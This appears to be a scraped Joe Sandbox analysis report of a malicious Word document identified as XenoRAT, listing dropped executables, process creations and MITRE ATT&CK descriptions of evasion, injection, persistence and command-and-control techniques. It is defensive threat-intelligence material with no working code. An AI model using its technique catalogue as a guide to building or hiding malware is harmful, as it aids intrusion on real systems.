Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yIla7SeJ6r.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: XenoRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{79847720-215F-4E11-8E77-239CB6350007}.tmp

C:\Users\user\AppData\Local\Temp\tmp6A67.tmp

C:\Users\user\AppData\Local\Temp\~DF030A54EA5482529A.TMP

C:\Users\user\AppData\Local\Temp\~DF196F33B581CC37E5.TMP

C:\Users\user\AppData\Local\Temp\~DFD52EF57B95502016.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\yIla7SeJ6r.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0809.lex

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Windows Analysis Report
yIla7SeJ6r.doc

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre